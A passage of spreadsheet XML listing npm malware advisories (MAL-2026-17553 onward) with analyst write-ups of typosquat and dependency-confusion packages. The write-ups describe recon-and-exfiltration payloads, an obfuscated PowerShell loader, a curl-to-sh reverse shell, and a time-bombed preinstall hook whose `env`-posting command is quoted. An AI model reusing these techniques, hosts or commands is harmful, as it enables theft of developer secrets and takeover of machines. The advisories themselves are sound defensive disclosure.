      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17553</t>
        </is>
      </c>
      <c r="D210" s="5" t="inlineStr"/>
      <c r="E210" s="5" t="inlineStr"/>
      <c r="F210" s="5" t="inlineStr"/>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr">
        <is>
          <t>npm:css-ikomdq-polyfill</t>
        </is>
      </c>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr"/>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (255cceca3ca8631c9b225745c5b64a71fd6c09b60fa3ad95b419fccb66f035f2)
The package presents itself as a CSS polyfill but ships thunderboltRegistry.js, which on require() executes a top-level IIFE that runs id, whoami, uname -a, ifconfig/ip addr, and reads /etc/hosts via child_process.execSync, then posts the command outputs together with hostname, node version, platform, and pid to the hardcoded plain-HTTP endpoint http://dxpoc.gt.tc/callback.php/ using fetch. The module also deletes its own entries from require.cache so the payload re-runs on each require() rather than being memoized. The package name and the thunderbolt/editor/corvid Proxy facade impersonate Wix parastorage registry modules to encourage accidental installation.
</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17553</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17554</t>
        </is>
      </c>
      <c r="D211" s="5" t="inlineStr"/>
      <c r="E211" s="5" t="inlineStr"/>
      <c r="F211" s="5" t="inlineStr"/>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr">
        <is>
          <t>npm:css-mpmdds-polyfill</t>
        </is>
      </c>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr"/>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4bac0cb0a2c693985668a890ff2ace72ff2d00dac60bc5470a77160c4d765106)
The package presents itself as a CSS polyfill but ships thunderboltRegistry.js which runs an IIFE at module load. The IIFE acquires child_process via multiple fallbacks (require('child_process'), require('node:child_process'), and a synthesized Module constructor), executes shell commands to collect host identity (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) along with os.hostname, Node version, platform and pid, and transmits each result via fetch() as query parameters to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plaintext HTTP to a free-DNS (gt.tc) host unrelated to any CSS polyfill functionality. The IIFE also enumerates require.cache and deletes entries containing 'thunderboltRegistry' so the payload re-executes on every require rather than being memoized. registry-manifest.min.json maps multiple Wix/thunderbolt internal registry module names (siteAssetsRegistry.js, editorRegistry.js, and others) all to the same thunderboltRegistry.js payload mirrored on static.parastorage.com's unpkg mirror, consistent with a dependency-confusion / typosquat targeting the Wix thunderbolt ecosystem. The package stubs a Wix-ecosystem API surface via Proxy to appear functional while the exfil IIFE runs. The package name resembles a CSS polyfill but the shipped behavior is host reconnaissance and exfiltration with cache-busting evasion.
</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17554</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17555</t>
        </is>
      </c>
      <c r="D212" s="5" t="inlineStr"/>
      <c r="E212" s="5" t="inlineStr"/>
      <c r="F212" s="5" t="inlineStr"/>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr">
        <is>
          <t>npm:css-nbanqq-polyfill</t>
        </is>
      </c>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr"/>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7377a70c94f8fd1719147b2023860926935a70410f672e07411326284f11a69f)
The package impersonates Wix thunderbolt internal registry modules (exporting `thunderboltRegistry`, `siteAssetsRegistry`, `editorRegistry`, `corvidRegistry`, etc. and shipping a `registry-manifest.min.json` referencing static.parastorage.com) as a dependency-confusion lure. On require of thunderboltRegistry.js, a top-level IIFE uses child_process.execSync to run `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts`, URL-encodes the output together with hostname, Node version, platform, and pid, and sends it via fetch to the hardcoded attacker endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. Proxy-wrapped stubs make the require() call appear to resolve normally while the exfiltration runs. Any build or runtime that resolves this package name will execute the reconnaissance payload and leak host identity and network configuration to the attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17555</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17556</t>
        </is>
      </c>
      <c r="D213" s="5" t="inlineStr"/>
      <c r="E213" s="5" t="inlineStr"/>
      <c r="F213" s="5" t="inlineStr"/>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr">
        <is>
          <t>npm:css-ogojwh-polyfill</t>
        </is>
      </c>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr"/>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (aff543635c832e0563229f42fcc7673c835f2ba5a9ae41d680aa572cfba49765)
css-ogojwh-polyfill@1.0.0 presents itself as a CSS polyfill but ships thunderboltRegistry.js which, on require, runs an IIFE that executes shell commands via child_process.execSync (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) and POSTs their output along with hostname, Node version, platform and pid to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f, with a beacon label of `rce-poc`. The module also exports no-op Proxy stubs under module names matching Wix thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, editorRegistry), consistent with a dependency-confusion / typosquat shim whose only real behavior is the recon-and-exfil payload executed at import time.
</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17556</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17557</t>
        </is>
      </c>
      <c r="D214" s="5" t="inlineStr"/>
      <c r="E214" s="5" t="inlineStr"/>
      <c r="F214" s="5" t="inlineStr"/>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr">
        <is>
          <t>npm:css-svqggc-polyfill</t>
        </is>
      </c>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr"/>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6b23cf39720388bcf9f26621bd52e256e18a011bf3b6821b7d9f5f60115b9663)
Package masquerades as a CSS polyfill while impersonating internal Wix Thunderbolt registry modules (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, and other namespace stubs), with a shipped registry-manifest pointing those names at parastorage.com URLs under this package's own name — a dependency-confusion shape. thunderboltRegistry.js runs an IIFE on require that purges its own entries from require.cache so each require re-runs the payload, obtains child_process via multiple fallbacks (including constructing a fresh Module instance to bypass sandboxed require stubs), and executes reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts) via execSync. The command output plus host beacon fields (node version, platform, pid, hostname, site) are sent over cleartext HTTP via fetch GET to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The Proxy-based stub exports ensure the import appears to succeed silently after exfiltration.
</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17557</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17558</t>
        </is>
      </c>
      <c r="D215" s="5" t="inlineStr"/>
      <c r="E215" s="5" t="inlineStr"/>
      <c r="F215" s="5" t="inlineStr"/>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr"/>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr">
        <is>
          <t>npm:css-txedrf-polyfill</t>
        </is>
      </c>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr"/>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7d70c660ff3138360df0239fc6ef3db7beaca61ca069bc2d108ed893c68acb63)
thunderboltRegistry.js executes an IIFE at require time that runs OS reconnaissance commands (id, whoami, uname -a, ifconfig/ip addr, cat /etc/hosts) via child_process.execSync, URL-encodes the output together with hostname, node version, platform, and pid, and POSTs/GETs each result via fetch to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f over plain HTTP. The package's exported module names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry) impersonate Wix thunderbolt internal registry modules and the manifest references static.parastorage.com URLs, consistent with a dependency-confusion lure aimed at a private Wix namespace. Any consumer that requires one of these modules triggers the reconnaissance and exfiltration to the attacker-controlled host.
</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17558</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17559</t>
        </is>
      </c>
      <c r="D216" s="5" t="inlineStr"/>
      <c r="E216" s="5" t="inlineStr"/>
      <c r="F216" s="5" t="inlineStr"/>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr"/>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-kex</t>
        </is>
      </c>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr"/>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b8fa212654344b734814cee2291c9b9b91ecbc353bde5e83740624ee5f263c69)
The npm package hardhat-kex@2.0.1 ships an obfuscated 4.5MB single-line bundle at lib/config.js (obfuscator.io-style string-array with a 26,234-entry table and numeric-dispatch wrapper, containing exec strings). The package main index.js unconditionally executes this bundle on require via `const config = require('./lib/config')`; the return value is never used, so the sole effect of importing the package is to run the obfuscated code. The surface API exported by index.js is an unrelated stub Express middleware that calls `next()`. The tarball additionally ships verbatim files from the pino logging library (lib/proto.js, levels.js, transport.js, worker.js, redaction.js, docs/, index.d.ts, README.md) despite the package being named for the Hardhat/Ethereum ecosystem and describing itself as a vulnerability-management tool; none of the pino sources are reachable through the exported API. The name/description/API mismatch combined with bundled pino cover-story files is a decoy pattern designed to make the tarball appear legitimate while the obfuscated loader is the only code that actually runs. Any project adding hardhat-kex as a dependency will execute the opaque payload on import.
</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17559</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17560</t>
        </is>
      </c>
      <c r="D217" s="5" t="inlineStr"/>
      <c r="E217" s="5" t="inlineStr"/>
      <c r="F217" s="5" t="inlineStr"/>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr">
        <is>
          <t>npm:hardhat-spack</t>
        </is>
      </c>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr"/>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (e59c971c63de9d0a7f66c26093f528164990af10eca00a3a36b97d0c8b0a6d0d)
The package is published as hardhat-spack but presents itself internally as a pino-like logger. Its main export is a middleware factory that spawns lib/caller.js as a detached child process. caller.js and lib/const.js define a fake process.env object whose DEV_API_KEY, DEV_SECRET_KEY, and DEV_SECRET_VALUE are base64 blobs; DEV_API_KEY decodes to https://iphub-encrypted.vercel.app/api/auth/f1f097d93c318c92f0c5. caller.js base64-decodes that URL, POSTs to it, and passes the response body to `new Function.constructor("require", s)` and invokes it with the real require, giving the fetched JavaScript full Node capabilities (filesystem, child_process, network). The request is retried up to five times and failures are swallowed. The destination host is disposable Vercel infrastructure unrelated to any declared purpose, the URL and credential-shaped values are concealed with base64, and the executed code is attacker-mutable at any time.
</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17560</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17561</t>
        </is>
      </c>
      <c r="D218" s="5" t="inlineStr"/>
      <c r="E218" s="5" t="inlineStr"/>
      <c r="F218" s="5" t="inlineStr"/>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr">
        <is>
          <t>npm:insomnia-plugin-api-lint-helper</t>
        </is>
      </c>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr"/>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (f3572e41f2e2e83a3156c1b24bf8684c0149a508e45626e80c592657cfb475ba)
index.js, the package's main entry, runs at require() time with no user interaction. On load it spawns OS-native calculator processes via child_process.exec ('calc.exe' on Windows, 'open -a Calculator' on macOS, 'gnome-calculator' on Linux) to demonstrate arbitrary code execution; writes a marker file to the user's Desktop (INSOMNIA_RCE_PROOF.txt); and serializes the full process.env object with JSON.stringify and emits it to the console, disclosing any tokens, API keys, and other secrets present in the environment of the host process (typically Insomnia on a developer machine). The source comments self-identify the module as a proof-of-concept remote code execution payload targeting Insomnia's plugin loader. The arbitrary-exec, filesystem write outside the package directory, and bulk environment enumeration all fire unconditionally at load.
</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17561</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17562</t>
        </is>
      </c>
      <c r="D219" s="5" t="inlineStr"/>
      <c r="E219" s="5" t="inlineStr"/>
      <c r="F219" s="5" t="inlineStr"/>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr">
        <is>
          <t>npm:internallib_v923</t>
        </is>
      </c>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr"/>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2d02d4c28dbcb2db331a6da7dba2476e3b7daf4f4d53d51d76d79ad4732d28a4)
index.js exports a command() function that shells out via /bin/bash -c to curl a payload from reverse-shell.sh and pipe it to sh, yielding a reverse shell to the hardcoded callback host 10.0.72.151:443. Any consumer requiring the package and invoking the exported API triggers remote-fetched shell execution with full-host control by the operator of the hardcoded callback. The manifest also declares a single dependency internallib_v79 and the sibling check.js invokes require('internallib_v79').command(), indicating the same payload shape is distributed across a package family with dependency-confusion-style naming (internallib_v&lt;n&gt;).
</t>
        </is>
      </c>
      <c r="T219" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17562</t>
        </is>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B220" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C220" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17563</t>
        </is>
      </c>
      <c r="D220" s="5" t="inlineStr"/>
      <c r="E220" s="5" t="inlineStr"/>
      <c r="F220" s="5" t="inlineStr"/>
      <c r="G220" s="5" t="inlineStr"/>
      <c r="H220" s="5" t="inlineStr"/>
      <c r="I220" s="5" t="inlineStr"/>
      <c r="J220" s="5" t="inlineStr"/>
      <c r="K220" s="5" t="inlineStr"/>
      <c r="L220" s="5" t="inlineStr">
        <is>
          <t>npm:risk-detection</t>
        </is>
      </c>
      <c r="M220" s="5" t="inlineStr"/>
      <c r="N220" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O220" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P220" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q220" s="5" t="inlineStr"/>
      <c r="R220" s="5" t="inlineStr"/>
      <c r="S220" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4b74a904a25687bbc34ad321ea019c5083f9a3651457750ed36207a209798f77)
package.json declares a dependency `ltidisafe` whose source is an off-registry tarball URL (`https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.8.1.tgz`) rather than a semver range on the npm registry. The shipped `index.js` is an empty stub (`module.exports = {}`), so the manifest URL is the entire install-time surface. On `npm install`, npm fetches whatever bytes that URL returns — unpinned, no integrity hash, no registry publisher check — installs the resulting package, and runs any lifecycle scripts inside it. Whoever controls that bucket path controls code execution on the installer's machine.
</t>
        </is>
      </c>
      <c r="T220" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17563</t>
        </is>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B221" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C221" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17564</t>
        </is>
      </c>
      <c r="D221" s="5" t="inlineStr"/>
      <c r="E221" s="5" t="inlineStr"/>
      <c r="F221" s="5" t="inlineStr"/>
      <c r="G221" s="5" t="inlineStr"/>
      <c r="H221" s="5" t="inlineStr"/>
      <c r="I221" s="5" t="inlineStr"/>
      <c r="J221" s="5" t="inlineStr"/>
      <c r="K221" s="5" t="inlineStr"/>
      <c r="L221" s="5" t="inlineStr">
        <is>
          <t>npm:tostpro</t>
        </is>
      </c>
      <c r="M221" s="5" t="inlineStr"/>
      <c r="N221" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O221" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P221" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q221" s="5" t="inlineStr"/>
      <c r="R221" s="5" t="inlineStr"/>
      <c r="S221" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2b31f6e946441400814984e1285717f9b2ee7fe5dacb7f0433f89396648a6183)
The npm package tostpro@100.2.0 ships a preinstall lifecycle hook that invokes test.sh, which runs automatically on `npm install`. The script assembles the command `curl` and the data source `env` from single-letter shell variables (b=e, i=c, s=n, h=u, a=v, l=rl) and splits the destination into `dom=https://abbishal.` plus `tld=com`, reconstructing them at runtime as `$i$h$l -d "`$b$s$a`" $dom$tld/sh/poc`. Execution is gated by `if [ `date +%s` -gt 1791141300 ]` (a Unix timestamp corresponding to roughly 2026-10-04); once that deadline passes, the output of `env` — the installer's full process environment, which routinely contains CI tokens, cloud credentials, and API keys — is POSTed to https://abbishal.com/sh/poc. The README states "No network access. No data collection," directly contradicting the shipped behavior. The string-splitting obfuscation, time-bomb gate, and cover-story README together indicate deliberate evasion.
</t>
        </is>
      </c>
      <c r="T221" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17564</t>
        </is>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B222" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C222" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17565</t>
        </is>
      </c>
      <c r="D222" s="5" t="inlineStr"/>
      <c r="E222" s="5" t="inlineStr"/>
      <c r="F222" s="5" t="inlineStr"/>
      <c r="G222" s="5" t="inlineStr"/>
      <c r="H222" s="5" t="inlineStr"/>
      <c r="I222" s="5" t="inlineStr"/>
      <c r="J222" s="5" t="inlineStr"/>
      <c r="K222" s="5" t="inlineStr"/>
      <c r="L222" s="5" t="inlineStr">
        <is>
          <t>npm:typesens</t>
        </is>
      </c>
      <c r="M222" s="5" t="inlineStr"/>
      <c r="N222" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O222" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="P222" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q222" s="5" t="inlineStr"/>
      <c r="R222" s="5" t="inlineStr"/>
      <c r="S222" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (3ded39f31b2c2d4d73e0b576ab862c9ed90688153a43c359dae5b26854ad8738)
package.json declares postinstall `wscript.exe 4444.vbs`, which runs automatically on `npm install`. The shipped 4444.vbs (~765 KB) contains a multi-layer decryption chain (AES S-box, ChaCha20-IETF, SHA-256 constants XOR-masked with 0x5A5A5A5A) over ~665 base64 chunks, decodes a payload to %TEMP% as a.dat file, drops a PowerShell loader, and invokes powershell.exe to perform process hollowing on Windows. Function names in the VBS are randomized (PlatformProbeLVI, DeviceCatalogUBYQ, EndpointRegistryRFX) and the `CreateObject` target is XOR-decoded at runtime; a cover-story header labels the file as a 'Verdant Signals Corp Device Telemetry Aggregator'. The advertised library surface — src/index.js is a trivial zod-based email-domain check with no network I/O, and the README claims 'No installation scripts' and describes a 'booking-eligibility' utility — is a decoy contradicting the package.json `files` entry that ships 4444.vbs and the postinstall hook that runs it. The typosquat-shaped name (typesens) reinforces the lure framing.
</t>
        </is>
      </c>
      <c r="T222" s="6" t="inlineStr">
        <is>
